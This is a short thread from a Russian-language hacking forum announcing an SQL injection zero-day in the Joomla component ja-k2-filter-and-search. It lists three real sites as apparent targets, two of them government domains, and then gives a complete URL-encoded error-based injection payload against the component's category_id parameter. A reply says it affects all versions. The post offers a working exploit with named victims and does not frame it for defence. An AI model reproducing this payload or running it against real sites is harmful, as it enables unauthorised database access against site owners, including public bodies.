Форум АНТИЧАТ - SQL Injection zero-day in component ja-k2-filter-and-search of Joomla

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - SQL Injection zero-day in component ja-k2-filter-and-search of Joomla (https://forum.antichat.xyz/showthread.php?t=443475)

http://sherdoust.ir/

http://www.arhitektura.mrt.gov.me/

http://www.cmvcapanema.pr.gov.br/

(WhateverSite)/index.php?category_id=(select%201%20and%20row(1%2c 1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2 cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHA R(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)% 2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%2 01%20union%20select%202)a%20group%20by%20x%20limit %201))&Itemid=135&option=com_jak2filter&searchword =the&view=itemlist&xf_2=5%27

As a result, the following error message is displayed proving the presence of vulnerability.

http://i2.wp.com/securityaffairs.co/...flaw.png?w=963

Это под какую версию?

Цитата:

Сообщение от brown

brown said:
↑
Это под какую версию?

Плагин

ja-k2-filter-and-search все версии